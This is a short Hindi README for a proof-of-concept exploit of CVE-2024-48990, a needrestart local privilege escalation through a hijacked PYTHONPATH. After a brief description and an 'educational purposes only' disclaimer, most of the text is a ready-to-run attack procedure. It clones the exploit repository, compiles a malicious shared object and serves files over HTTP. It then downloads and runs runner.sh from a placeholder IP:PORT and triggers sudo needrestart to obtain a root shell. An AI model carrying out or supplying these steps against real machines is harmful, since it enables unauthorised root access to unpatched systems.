
CVE-2024-48990 के बारे में PoC। Qualys ने खोजा कि needrestart, संस्करण 3.8 से पहले, स्थानीय हमलावरों को needrestart को attacker-नियंत्रित PYTHONPATH पर्यावरण चर के साथ Python इंटरप्रेटर चलाने के लिए धोखा देकर रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है। (NIST)
[!WARNING] ये फ़ाइलें और जानकारियाँ केवल शैक्षिक उद्देश्य के लिए हैं। लेखक किसी भी दुर्भावनापूर्ण व्यवहार के लिए ज़िम्मेदार नहीं है। दी गई सभी जानकारियाँ किसी भी प्रकार के अपराध या दुरुपयोग को भड़काने के लिए नहीं हैं।
Qualys ने पता लगाया कि needrestart, संस्करण 3.8 से पहले, स्थानीय हमलावरों को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है, जिससे needrestart को हमलावर-नियंत्रित PYTHONPATH पर्यावरण चर के साथ Python इंटरप्रेटर चलाने के लिए धोखा दिया जाता है। आधिकारिक विवरण के लिए NIST देखें।
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
जब [*] CVE module created पढ़ें तो प्रक्रिया रोकने और अपना शेल पाने के लिए CTRL+C दबाएँ!